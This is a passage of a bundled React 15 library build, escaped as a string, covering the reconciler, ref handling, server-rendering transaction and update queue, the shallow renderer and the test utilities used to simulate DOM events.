internalInstance\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @param {?object} the containing host component instance\n   * @param {?object} info about the host container\n   * @return {?string} Rendered markup to be inserted into the DOM.\n   * @final\n   * @internal\n   */\n  mountComponent: function (internalInstance, transaction, hostParent, hostContainerInfo, context, parentDebugID) // 0 in production and for roots\n  {\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onBeforeMountComponent(internalInstance._debugID, internalInstance._currentElement, parentDebugID);\n      }\n    }\n    var markup = internalInstance.mountComponent(transaction, hostParent, hostContainerInfo, context, parentDebugID);\n    if (internalInstance._currentElement && internalInstance._currentElement.ref != null) {\n      transaction.getReactMountReady().enqueue(attachRefs, internalInstance);\n    }\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onMountComponent(internalInstance._debugID);\n      }\n    }\n    return markup;\n  },\n\n  /**\n   * Returns a value that can be passed to\n   * ReactComponentEnvironment.replaceNodeWithMarkup.\n   */\n  getHostNode: function (internalInstance) {\n    return internalInstance.getHostNode();\n  },\n\n  /**\n   * Releases any resources allocated by `mountComponent`.\n   *\n   * @final\n   * @internal\n   */\n  unmountComponent: function (internalInstance, safely) {\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onBeforeUnmountComponent(internalInstance._debugID);\n      }\n    }\n    ReactRef.detachRefs(internalInstance, internalInstance._currentElement);\n    internalInstance.unmountComponent(safely);\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onUnmountComponent(internalInstance._debugID);\n      }\n    }\n  },\n\n  /**\n   * Update a component using a new element.\n   *\n   * @param {ReactComponent} internalInstance\n   * @param {ReactElement} nextElement\n   * @param {ReactReconcileTransaction} transaction\n   * @param {object} context\n   * @internal\n   */\n  receiveComponent: function (internalInstance, nextElement, transaction, context) {\n    var prevElement = internalInstance._currentElement;\n\n    if (nextElement === prevElement && context === internalInstance._context) {\n      // Since elements are immutable after the owner is rendered,\n      // we can do a cheap identity compare here to determine if this is a\n      // superfluous reconcile. It's possible for state to be mutable but such\n      // change should trigger an update of the owner which would recreate\n      // the element. We explicitly check for the existence of an owner since\n      // it's possible for an element created outside a composite to be\n      // deeply mutated and reused.\n\n      // TODO: Bailing out early is just a perf optimization right?\n      // TODO: Removing the return statement should affect correctness?\n      return;\n    }\n\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onBeforeUpdateComponent(internalInstance._debugID, nextElement);\n      }\n    }\n\n    var refsChanged = ReactRef.shouldUpdateRefs(prevElement, nextElement);\n\n    if (refsChanged) {\n      ReactRef.detachRefs(internalInstance, prevElement);\n    }\n\n    internalInstance.receiveComponent(nextElement, transaction, context);\n\n    if (refsChanged && internalInstance._currentElement && internalInstance._currentElement.ref != null) {\n      transaction.getReactMountReady().enqueue(attachRefs, internalInstance);\n    }\n\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onUpdateComponent(internalInstance._debugID);\n      }\n    }\n  },\n\n  /**\n   * Flush any dirty changes in a component.\n   *\n   * @param {ReactComponent} internalInstance\n   * @param {ReactReconcileTransaction} transaction\n   * @internal\n   */\n  performUpdateIfNecessary: function (internalInstance, transaction, updateBatchNumber) {\n    if (internalInstance._updateBatchNumber !== updateBatchNumber) {\n      // The component's enqueued batch number should always be the current\n      // batch or the following one.\n      \"development\" !== 'production' ? warning(internalInstance._updateBatchNumber == null || internalInstance._updateBatchNumber === updateBatchNumber + 1, 'performUpdateIfNecessary: Unexpected batch number (current %s, ' + 'pending %s)', updateBatchNumber, internalInstance._updateBatchNumber) : void 0;\n      return;\n    }\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onBeforeUpdateComponent(internalInstance._debugID, internalInstance._currentElement);\n      }\n    }\n    internalInstance.performUpdateIfNecessary(transaction);\n    if (\"development\" !== 'production') {\n      if (internalInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onUpdateComponent(internalInstance._debugID);\n      }\n    }\n  }\n};\n\nmodule.exports = ReactReconciler;\n},{\"159\":159,\"64\":64,\"76\":76}],76:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactOwner = _dereq_(70);\n\nvar ReactRef = {};\n\nfunction attachRef(ref, component, owner) {\n  if (typeof ref === 'function') {\n    ref(component.getPublicInstance());\n  } else {\n    // Legacy ref\n    ReactOwner.addComponentAsRefTo(component, ref, owner);\n  }\n}\n\nfunction detachRef(ref, component, owner) {\n  if (typeof ref === 'function') {\n    ref(null);\n  } else {\n    // Legacy ref\n    ReactOwner.removeComponentAsRefFrom(component, ref, owner);\n  }\n}\n\nReactRef.attachRefs = function (instance, element) {\n  if (element === null || typeof element !== 'object') {\n    return;\n  }\n  var ref = element.ref;\n  if (ref != null) {\n    attachRef(ref, instance, element._owner);\n  }\n};\n\nReactRef.shouldUpdateRefs = function (prevElement, nextElement) {\n  // If either the owner or a `ref` has changed, make sure the newest owner\n  // has stored a reference to `this`, and the previous owner (if different)\n  // has forgotten the reference to `this`. We use the element instead\n  // of the public this.props because the post processing cannot determine\n  // a ref. The ref conceptually lives on the element.\n\n  // TODO: Should this even be possible? The owner cannot change because\n  // it's forbidden by shouldUpdateReactComponent. The ref can change\n  // if you swap the keys of but not the refs. Reconsider where this check\n  // is made. It probably belongs where the key checking and\n  // instantiateReactComponent is done.\n\n  var prevRef = null;\n  var prevOwner = null;\n  if (prevElement !== null && typeof prevElement === 'object') {\n    prevRef = prevElement.ref;\n    prevOwner = prevElement._owner;\n  }\n\n  var nextRef = null;\n  var nextOwner = null;\n  if (nextElement !== null && typeof nextElement === 'object') {\n    nextRef = nextElement.ref;\n    nextOwner = nextElement._owner;\n  }\n\n  return prevRef !== nextRef ||\n  // If owner changes but we have an unchanged function ref, don't update refs\n  typeof nextRef === 'string' && nextOwner !== prevOwner;\n};\n\nReactRef.detachRefs = function (instance, element) {\n  if (element === null || typeof element !== 'object') {\n    return;\n  }\n  var ref = element.ref;\n  if (ref != null) {\n    detachRef(ref, instance, element._owner);\n  }\n};\n\nmodule.exports = ReactRef;\n},{\"70\":70}],77:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar PooledClass = _dereq_(25);\nvar Transaction = _dereq_(100);\nvar ReactInstrumentation = _dereq_(64);\nvar ReactServerUpdateQueue = _dereq_(78);\n\n/**\n * Executed within the scope of the `Transaction` instance. Consider these as\n * being member methods, but with an implied ordering while being isolated from\n * each other.\n */\nvar TRANSACTION_WRAPPERS = [];\n\nif (\"development\" !== 'production') {\n  TRANSACTION_WRAPPERS.push({\n    initialize: ReactInstrumentation.debugTool.onBeginFlush,\n    close: ReactInstrumentation.debugTool.onEndFlush\n  });\n}\n\nvar noopCallbackQueue = {\n  enqueue: function () {}\n};\n\n/**\n * @class ReactServerRenderingTransaction\n * @param {boolean} renderToStaticMarkup\n */\nfunction ReactServerRenderingTransaction(renderToStaticMarkup) {\n  this.reinitializeTransaction();\n  this.renderToStaticMarkup = renderToStaticMarkup;\n  this.useCreateElement = false;\n  this.updateQueue = new ReactServerUpdateQueue(this);\n}\n\nvar Mixin = {\n  /**\n   * @see Transaction\n   * @abstract\n   * @final\n   * @return {array} Empty list of operation wrap procedures.\n   */\n  getTransactionWrappers: function () {\n    return TRANSACTION_WRAPPERS;\n  },\n\n  /**\n   * @return {object} The queue to collect `onDOMReady` callbacks with.\n   */\n  getReactMountReady: function () {\n    return noopCallbackQueue;\n  },\n\n  /**\n   * @return {object} The queue to collect React async events.\n   */\n  getUpdateQueue: function () {\n    return this.updateQueue;\n  },\n\n  /**\n   * `PooledClass` looks for this, and will invoke this before allowing this\n   * instance to be reused.\n   */\n  destructor: function () {},\n\n  checkpoint: function () {},\n\n  rollback: function () {}\n};\n\n_assign(ReactServerRenderingTransaction.prototype, Transaction, Mixin);\n\nPooledClass.addPoolingTo(ReactServerRenderingTransaction);\n\nmodule.exports = ReactServerRenderingTransaction;\n},{\"100\":100,\"160\":160,\"25\":25,\"64\":64,\"78\":78}],78:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nfunction _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError(\"Cannot call a class as a function\"); } }\n\nvar ReactUpdateQueue = _dereq_(81);\n\nvar warning = _dereq_(159);\n\nfunction warnNoop(publicInstance, callerName) {\n  if (\"development\" !== 'production') {\n    var constructor = publicInstance.constructor;\n    \"development\" !== 'production' ? warning(false, '%s(...): Can only update a mounting component. ' + 'This usually means you called %s() outside componentWillMount() on the server. ' + 'This is a no-op. Please check the code for the %s component.', callerName, callerName, constructor && (constructor.displayName || constructor.name) || 'ReactClass') : void 0;\n  }\n}\n\n/**\n * This is the update queue used for server rendering.\n * It delegates to ReactUpdateQueue while server rendering is in progress and\n * switches to ReactNoopUpdateQueue after the transaction has completed.\n * @class ReactServerUpdateQueue\n * @param {Transaction} transaction\n */\n\nvar ReactServerUpdateQueue = function () {\n  function ReactServerUpdateQueue(transaction) {\n    _classCallCheck(this, ReactServerUpdateQueue);\n\n    this.transaction = transaction;\n  }\n\n  /**\n   * Checks whether or not this composite component is mounted.\n   * @param {ReactClass} publicInstance The instance we want to test.\n   * @return {boolean} True if mounted, false otherwise.\n   * @protected\n   * @final\n   */\n\n\n  ReactServerUpdateQueue.prototype.isMounted = function isMounted(publicInstance) {\n    return false;\n  };\n\n  /**\n   * Enqueue a callback that will be executed after all the pending updates\n   * have processed.\n   *\n   * @param {ReactClass} publicInstance The instance to use as `this` context.\n   * @param {?function} callback Called after state is updated.\n   * @internal\n   */\n\n\n  ReactServerUpdateQueue.prototype.enqueueCallback = function enqueueCallback(publicInstance, callback, callerName) {\n    if (this.transaction.isInTransaction()) {\n      ReactUpdateQueue.enqueueCallback(publicInstance, callback, callerName);\n    }\n  };\n\n  /**\n   * Forces an update. This should only be invoked when it is known with\n   * certainty that we are **not** in a DOM transaction.\n   *\n   * You may want to call this when you know that some deeper aspect of the\n   * component's state has changed but `setState` was not called.\n   *\n   * This will not invoke `shouldComponentUpdate`, but it will invoke\n   * `componentWillUpdate` and `componentDidUpdate`.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @internal\n   */\n\n\n  ReactServerUpdateQueue.prototype.enqueueForceUpdate = function enqueueForceUpdate(publicInstance) {\n    if (this.transaction.isInTransaction()) {\n      ReactUpdateQueue.enqueueForceUpdate(publicInstance);\n    } else {\n      warnNoop(publicInstance, 'forceUpdate');\n    }\n  };\n\n  /**\n   * Replaces all of the state. Always use this or `setState` to mutate state.\n   * You should treat `this.state` as immutable.\n   *\n   * There is no guarantee that `this.state` will be immediately updated, so\n   * accessing `this.state` after calling this method may return the old value.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object|function} completeState Next state.\n   * @internal\n   */\n\n\n  ReactServerUpdateQueue.prototype.enqueueReplaceState = function enqueueReplaceState(publicInstance, completeState) {\n    if (this.transaction.isInTransaction()) {\n      ReactUpdateQueue.enqueueReplaceState(publicInstance, completeState);\n    } else {\n      warnNoop(publicInstance, 'replaceState');\n    }\n  };\n\n  /**\n   * Sets a subset of the state. This only exists because _pendingState is\n   * internal. This provides a merging strategy that is not available to deep\n   * properties which is confusing. TODO: Expose pendingState or don't use it\n   * during the merge.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object|function} partialState Next partial state to be merged with state.\n   * @internal\n   */\n\n\n  ReactServerUpdateQueue.prototype.enqueueSetState = function enqueueSetState(publicInstance, partialState) {\n    if (this.transaction.isInTransaction()) {\n      ReactUpdateQueue.enqueueSetState(publicInstance, partialState);\n    } else {\n      warnNoop(publicInstance, 'setState');\n    }\n  };\n\n  return ReactServerUpdateQueue;\n}();\n\nmodule.exports = ReactServerUpdateQueue;\n},{\"159\":159,\"81\":81}],79:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nfunction _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError(\"Cannot call a class as a function\"); } }\n\nvar React = _dereq_(135);\nvar ReactCompositeComponent = _dereq_(30);\nvar ReactDefaultBatchingStrategy = _dereq_(51);\nvar ReactReconciler = _dereq_(75);\nvar ReactReconcileTransaction = _dereq_(74);\nvar ReactUpdates = _dereq_(82);\n\nvar emptyObject = _dereq_(145);\nvar getNextDebugID = _dereq_(136);\nvar invariant = _dereq_(152);\n\nfunction injectDefaults() {\n  ReactUpdates.injection.injectReconcileTransaction(ReactReconcileTransaction);\n  ReactUpdates.injection.injectBatchingStrategy(ReactDefaultBatchingStrategy);\n}\n\nvar NoopInternalComponent = function () {\n  function NoopInternalComponent(element) {\n    _classCallCheck(this, NoopInternalComponent);\n\n    this._renderedOutput = element;\n    this._currentElement = element;\n\n    if (\"development\" !== 'production') {\n      this._debugID = getNextDebugID();\n    }\n  }\n\n  NoopInternalComponent.prototype.mountComponent = function mountComponent() {};\n\n  NoopInternalComponent.prototype.receiveComponent = function receiveComponent(element) {\n    this._renderedOutput = element;\n    this._currentElement = element;\n  };\n\n  NoopInternalComponent.prototype.unmountComponent = function unmountComponent() {};\n\n  NoopInternalComponent.prototype.getHostNode = function getHostNode() {\n    return undefined;\n  };\n\n  NoopInternalComponent.prototype.getPublicInstance = function getPublicInstance() {\n    return null;\n  };\n\n  return NoopInternalComponent;\n}();\n\nvar ShallowComponentWrapper = function (element) {\n  // TODO: Consolidate with instantiateReactComponent\n  if (\"development\" !== 'production') {\n    this._debugID = getNextDebugID();\n  }\n\n  this.construct(element);\n};\n_assign(ShallowComponentWrapper.prototype, ReactCompositeComponent, {\n  _constructComponent: ReactCompositeComponent._constructComponentWithoutOwner,\n  _instantiateReactComponent: function (element) {\n    return new NoopInternalComponent(element);\n  },\n  _replaceNodeWithMarkup: function () {},\n  _renderValidatedComponent: ReactCompositeComponent._renderValidatedComponentWithoutOwnerOrContext\n});\n\nfunction _batchedRender(renderer, element, context) {\n  var transaction = ReactUpdates.ReactReconcileTransaction.getPooled(true);\n  renderer._render(element, transaction, context);\n  ReactUpdates.ReactReconcileTransaction.release(transaction);\n}\n\nvar ReactShallowRenderer = function () {\n  function ReactShallowRenderer() {\n    _classCallCheck(this, ReactShallowRenderer);\n\n    this._instance = null;\n  }\n\n  ReactShallowRenderer.prototype.getMountedInstance = function getMountedInstance() {\n    return this._instance ? this._instance._instance : null;\n  };\n\n  ReactShallowRenderer.prototype.render = function render(element, context) {\n    // Ensure we've done the default injections. This might not be true in the\n    // case of a simple test that only requires React and the TestUtils in\n    // conjunction with an inline-requires transform.\n    injectDefaults();\n\n    !React.isValidElement(element) ? \"development\" !== 'production' ? invariant(false, 'ReactShallowRenderer render(): Invalid component element.%s', typeof element === 'function' ? ' Instead of passing a component class, make sure to instantiate ' + 'it by passing it to React.createElement.' : '') : _prodInvariant('12', typeof element === 'function' ? ' Instead of passing a component class, make sure to instantiate ' + 'it by passing it to React.createElement.' : '') : void 0;\n    !(typeof element.type !== 'string') ? \"development\" !== 'production' ? invariant(false, 'ReactShallowRenderer render(): Shallow rendering works only with custom components, not primitives (%s). Instead of calling `.render(el)` and inspecting the rendered output, look at `el.props` directly instead.', element.type) : _prodInvariant('13', element.type) : void 0;\n\n    if (!context) {\n      context = emptyObject;\n    }\n    ReactUpdates.batchedUpdates(_batchedRender, this, element, context);\n\n    return this.getRenderOutput();\n  };\n\n  ReactShallowRenderer.prototype.getRenderOutput = function getRenderOutput() {\n    return this._instance && this._instance._renderedComponent && this._instance._renderedComponent._renderedOutput || null;\n  };\n\n  ReactShallowRenderer.prototype.unmount = function unmount() {\n    if (this._instance) {\n      ReactReconciler.unmountComponent(this._instance, false);\n    }\n  };\n\n  ReactShallowRenderer.prototype.unstable_batchedUpdates = function unstable_batchedUpdates(callback, bookkeeping) {\n    // This is used by Enzyme for fake-simulating events in shallow mode.\n    injectDefaults();\n    return ReactUpdates.batchedUpdates(callback, bookkeeping);\n  };\n\n  ReactShallowRenderer.prototype._render = function _render(element, transaction, context) {\n    if (this._instance) {\n      ReactReconciler.receiveComponent(this._instance, element, transaction, context);\n    } else {\n      var instance = new ShallowComponentWrapper(element);\n      ReactReconciler.mountComponent(instance, transaction, null, null, context, 0);\n      this._instance = instance;\n    }\n  };\n\n  return ReactShallowRenderer;\n}();\n\nReactShallowRenderer.createRenderer = function () {\n  return new ReactShallowRenderer();\n};\n\nmodule.exports = ReactShallowRenderer;\n},{\"126\":126,\"135\":135,\"136\":136,\"145\":145,\"152\":152,\"160\":160,\"30\":30,\"51\":51,\"74\":74,\"75\":75,\"82\":82}],80:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar EventConstants = _dereq_(16);\nvar EventPluginHub = _dereq_(17);\nvar EventPluginRegistry = _dereq_(18);\nvar EventPropagators = _dereq_(20);\nvar React = _dereq_(135);\nvar ReactDOM = _dereq_(31);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactBrowserEventEmitter = _dereq_(26);\nvar ReactInstanceMap = _dereq_(63);\nvar ReactUpdates = _dereq_(82);\nvar SyntheticEvent = _dereq_(91);\nvar ReactShallowRenderer = _dereq_(79);\n\nvar findDOMNode = _dereq_(108);\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar topLevelTypes = EventConstants.topLevelTypes;\n\nfunction Event(suffix) {}\n\n// In react 16+ shallowRenderer will not be accessible via ReactTestUtils.createRenderer()\n// Instead it will be available via react-test-renderer/shallow\n// Maintain backwards compat for 15.5.0 release, but warn about using the deprecated method\nvar hasWarnedAboutCreateRenderer = false;\nfunction createRendererWithWarning() {\n  \"development\" !== 'production' ? warning(hasWarnedAboutCreateRenderer, 'Shallow renderer has been moved to react-test-renderer/shallow. ' + 'Update references to remove this warning.') : void 0;\n  hasWarnedAboutCreateRenderer = true;\n\n  return new ReactShallowRenderer();\n}\n\n/**\n * @class ReactTestUtils\n */\n\nfunction findAllInRenderedTreeInternal(inst, test) {\n  if (!inst || !inst.getPublicInstance) {\n    return [];\n  }\n  var publicInst = inst.getPublicInstance();\n  var ret = test(publicInst) ? [publicInst] : [];\n  var currentElement = inst._currentElement;\n  if (ReactTestUtils.isDOMComponent(publicInst)) {\n    var renderedChildren = inst._renderedChildren;\n    var key;\n    for (key in renderedChildren) {\n      if (!renderedChildren.hasOwnProperty(key)) {\n        continue;\n      }\n      ret = ret.concat(findAllInRenderedTreeInternal(renderedChildren[key], test));\n    }\n  } else if (React.isValidElement(currentElement) && typeof currentElement.type === 'function') {\n    ret = ret.concat(findAllInRenderedTreeInternal(inst._renderedComponent, test));\n  }\n  return ret;\n}\n\n/**\n * Utilities for making it easy to test React components.\n *\n * See https://facebook.github.io/react/docs/test-utils.html\n *\n * Todo: Support the entire DOM.scry query syntax. For now, these simple\n * utilities will suffice for testing purposes.\n * @lends ReactTestUtils\n */\nvar ReactTestUtils = {\n  renderIntoDocument: function (element) {\n    var div = document.createElement('div');\n    // None of our tests actually require attaching the container to the\n    // DOM, and doing so creates a mess that we rely on test isolation to\n    // clean up, so we're going to stop honoring the name of this method\n    // (and probably rename it eventually) if no problems arise.\n    // document.documentElement.appendChild(div);\n    return ReactDOM.render(element, div);\n  },\n\n  isElement: function (element) {\n    return React.isValidElement(element);\n  },\n\n  isElementOfType: function (inst, convenienceConstructor) {\n    return React.isValidElement(inst) && inst.type === convenienceConstructor;\n  },\n\n  isDOMComponent: function (inst) {\n    return !!(inst && inst.nodeType === 1 && inst.tagName);\n  },\n\n  isDOMComponentElement: function (inst) {\n    return !!(inst && React.isValidElement(inst) && !!inst.tagName);\n  },\n\n  isCompositeComponent: function (inst) {\n    if (ReactTestUtils.isDOMComponent(inst)) {\n      // Accessing inst.setState warns; just return false as that'll be what\n      // this returns when we have DOM nodes as refs directly\n      return false;\n    }\n    return inst != null && typeof inst.render === 'function' && typeof inst.setState === 'function';\n  },\n\n  isCompositeComponentWithType: function (inst, type) {\n    if (!ReactTestUtils.isCompositeComponent(inst)) {\n      return false;\n    }\n    var internalInstance = ReactInstanceMap.get(inst);\n    var constructor = internalInstance._currentElement.type;\n\n    return constructor === type;\n  },\n\n  isCompositeComponentElement: function (inst) {\n    if (!React.isValidElement(inst)) {\n      return false;\n    }\n    // We check the prototype of the type that will get mounted, not the\n    // instance itself. This is a future proof way of duck typing.\n    var prototype = inst.type.prototype;\n    return typeof prototype.render === 'function' && typeof prototype.setState === 'function';\n  },\n\n  isCompositeComponentElementWithType: function (inst, type) {\n    var internalInstance = ReactInstanceMap.get(inst);\n    var constructor = internalInstance._currentElement.type;\n\n    return !!(ReactTestUtils.isCompositeComponentElement(inst) && constructor === type);\n  },\n\n  getRenderedChildOfCompositeComponent: function (inst) {\n    if (!ReactTestUtils.isCompositeComponent(inst)) {\n      return null;\n    }\n    var internalInstance = ReactInstanceMap.get(inst);\n    return internalInstance._renderedComponent.getPublicInstance();\n  },\n\n  findAllInRenderedTree: function (inst, test) {\n    if (!inst) {\n      return [];\n    }\n    !ReactTestUtils.isCompositeComponent(inst) ? \"development\" !== 'production' ? invariant(false, 'findAllInRenderedTree(...): instance must be a composite component') : _prodInvariant('10') : void 0;\n    return findAllInRenderedTreeInternal(ReactInstanceMap.get(inst), test);\n  },\n\n  /**\n   * Finds all instance of components in the rendered tree that are DOM\n   * components with the class name matching `className`.\n   * @return {array} an array of all the matches.\n   */\n  scryRenderedDOMComponentsWithClass: function (root, classNames) {\n    return ReactTestUtils.findAllInRenderedTree(root, function (inst) {\n      if (ReactTestUtils.isDOMComponent(inst)) {\n        var className = inst.className;\n        if (typeof className !== 'string') {\n          // SVG, probably.\n          className = inst.getAttribute('class') || '';\n        }\n        var classList = className.split(/\\s+/);\n\n        if (!Array.isArray(classNames)) {\n          !(classNames !== undefined) ? \"development\" !== 'production' ? invariant(false, 'TestUtils.scryRenderedDOMComponentsWithClass expects a className as a second argument.') : _prodInvariant('11') : void 0;\n          classNames = classNames.split(/\\s+/);\n        }\n        return classNames.every(function (name) {\n          return classList.indexOf(name) !== -1;\n        });\n      }\n      return false;\n    });\n  },\n\n  /**\n   * Like scryRenderedDOMComponentsWithClass but expects there to be one result,\n   * and returns that one result, or throws exception if there is any other\n   * number of matches besides one.\n   * @return {!ReactDOMComponent} The one match.\n   */\n  findRenderedDOMComponentWithClass: function (root, className) {\n    var all = ReactTestUtils.scryRenderedDOMComponentsWithClass(root, className);\n    if (all.length !== 1) {\n      throw new Error('Did not find exactly one match (found: ' + all.length + ') ' + 'for class:' + className);\n    }\n    return all[0];\n  },\n\n  /**\n   * Finds all instance of components in the rendered tree that are DOM\n   * components with the tag name matching `tagName`.\n   * @return {array} an array of all the matches.\n   */\n  scryRenderedDOMComponentsWithTag: function (root, tagName) {\n    return ReactTestUtils.findAllInRenderedTree(root, function (inst) {\n      return ReactTestUtils.isDOMComponent(inst) && inst.tagName.toUpperCase() === tagName.toUpperCase();\n    });\n  },\n\n  /**\n   * Like scryRenderedDOMComponentsWithTag but expects there to be one result,\n   * and returns that one result, or throws exception if there is any other\n   * number of matches besides one.\n   * @return {!ReactDOMComponent} The one match.\n   */\n  findRenderedDOMComponentWithTag: function (root, tagName) {\n    var all = ReactTestUtils.scryRenderedDOMComponentsWithTag(root, tagName);\n    if (all.length !== 1) {\n      throw new Error('Did not find exactly one match (found: ' + all.length + ') ' + 'for tag:' + tagName);\n    }\n    return all[0];\n  },\n\n  /**\n   * Finds all instances of components with type equal to `componentType`.\n   * @return {array} an array of all the matches.\n   */\n  scryRenderedComponentsWithType: function (root, componentType) {\n    return ReactTestUtils.findAllInRenderedTree(root, function (inst) {\n      return ReactTestUtils.isCompositeComponentWithType(inst, componentType);\n    });\n  },\n\n  /**\n   * Same as `scryRenderedComponentsWithType` but expects there to be one result\n   * and returns that one result, or throws exception if there is any other\n   * number of matches besides one.\n   * @return {!ReactComponent} The one match.\n   */\n  findRenderedComponentWithType: function (root, componentType) {\n    var all = ReactTestUtils.scryRenderedComponentsWithType(root, componentType);\n    if (all.length !== 1) {\n      throw new Error('Did not find exactly one match (found: ' + all.length + ') ' + 'for componentType:' + componentType);\n    }\n    return all[0];\n  },\n\n  /**\n   * Pass a mocked component module to this method to augment it with\n   * useful methods that allow it to be used as a dummy React component.\n   * Instead of rendering as usual, the component will become a simple\n   * <div> containing any provided children.\n   *\n   * @param {object} module the mock function object exported from a\n   *                        module that defines the component to be mocked\n   * @param {?string} mockTagName optional dummy root tag name to return\n   *                              from render method (overrides\n   *                              module.mockTagName if provided)\n   * @return {object} the ReactTestUtils object (for chaining)\n   */\n  mockComponent: function (module, mockTagName) {\n    mockTagName = mockTagName || module.mockTagName || 'div';\n\n    module.prototype.render.mockImplementation(function () {\n      return React.createElement(mockTagName, null, this.props.children);\n    });\n\n    return this;\n  },\n\n  /**\n   * Simulates a top level event being dispatched from a raw event that occurred\n   * on an `Element` node.\n   * @param {Object} topLevelType A type from `EventConstants.topLevelTypes`\n   * @param {!Element} node The dom to simulate an event occurring on.\n   * @param {?Event} fakeNativeEvent Fake native event to use in SyntheticEvent.\n   */\n  simulateNativeEventOnNode: function (topLevelType, node, fakeNativeEvent) {\n    fakeNativeEvent.target = node;\n    fakeNativeEvent.simulated = true;\n    ReactBrowserEventEmitter.ReactEventListener.dispatchEvent(topLevelType, fakeNativeEvent);\n  },\n\n  /**\n   * Simulates a top level event being dispatched from a raw event that occurred\n   * on the `ReactDOMComponent` `comp`.\n   * @param {Object} topLevelType A type from `EventConstants.topLevelTypes`.\n   * @param {!ReactDOMComponent} comp\n   * @param {?Event} fakeNativeEvent Fake native event to use in SyntheticEvent.\n   */\n  simulateNativeEventOnDOMComponent: function (topLevelType, comp, fakeNativeEvent) {\n    ReactTestUtils.simulateNativeEventOnNode(topLevelType, findDOMNode(comp), fakeNativeEvent);\n  },\n\n  nativeTouchData: function (x, y) {\n    return {\n      touches: [{ pageX: x, pageY: y }]\n    };\n  },\n\n  createRenderer: createRendererWithWarning,\n\n  Simulate: null,\n  SimulateNative: {}\n};\n\n/**\n * Exports:\n *\n * - `ReactTestUtils.Simulate.click(Element/ReactDOMComponent)`\n * - `ReactTestUtils.Simulate.mouseMove(Element/ReactDOMComponent)`\n * - `ReactTestUtils.Simulate.change(Element/ReactDOMComponent)`\n * - ... (All keys from event plugin `eventTypes` objects)\n */\nfunction makeSimulator(eventType) {\n  return function (domComponentOrNode, eventData) {\n    var node;\n    !!React.isValidElement(domComponentOrNode) ? \"development\" !== 'production' ? invariant(false, 'TestUtils.Simulate expects a component instance and not a ReactElement.TestUtils.Simulate will not work if you are using shallow rendering.') : _prodInvariant('14') : void 0;\n    if (ReactTestUtils.isDOMComponent(domComponentOrNode)) {\n      node = findDOMNode(domComponentOrNode);\n    } else if (domComponentOrNode.tagName) {\n      node = domComponentOrNode;\n    }\n\n    var dispatchConfig = EventPluginRegistry.eventNameDispatchConfigs[eventType];\n\n    var fakeNativeEvent = new Event();\n    fakeNativeEvent.target = node;\n    fakeNativeEvent.type = eventType.toLowerCase();\n\n    // We don't use SyntheticEvent.getPooled in order to not have to worry about\n    // properly destroying any properties assigned from `eventData` upon release\n    var event = new SyntheticEvent(dispatchConfig, ReactDOMComponentTree.getInstanceFromNode(node), fakeNativeEvent, node);\n    // Since we aren't using pooling, always persist the event. This will make\n    // sure it's marked and won't warn when setting additional properties.\n    event.persist();\n    _assign(event, eventData);\n\n    if (dispatchConfig.phasedRegistrationNames) {\n      EventPropagators.accumulateTwoPhaseDispatches(event);\n    } else {\n      EventPropagators.accumulateDirectDispatches(event);\n    }\n\n    ReactUpdates.batchedUpdates(function () {\n      EventPluginHub.enqueueEvents(event);\n      EventPluginHub.processEventQueue(true);\n    });\n  };\n}\n\nfunction buildSimulators() {\n  ReactTestUtils.Simulate = {};\n\n  var eventType;\n  for (eventType in EventPluginRegistry.eventNameDispatchConfigs) {\n    /**\n     * @param {!Element|ReactDOMComponent} domComponentOrNode\n     * @param {?object} eventData Fake event data to use in SyntheticEvent.\n     */\n    ReactTestUtils.Simulate[eventType] = makeSimulator(eventType);\n  }\n}\n\n// Rebuild ReactTestUtils.Simulate whenever event plugins are injected\nvar oldInjectEventPluginOrder = 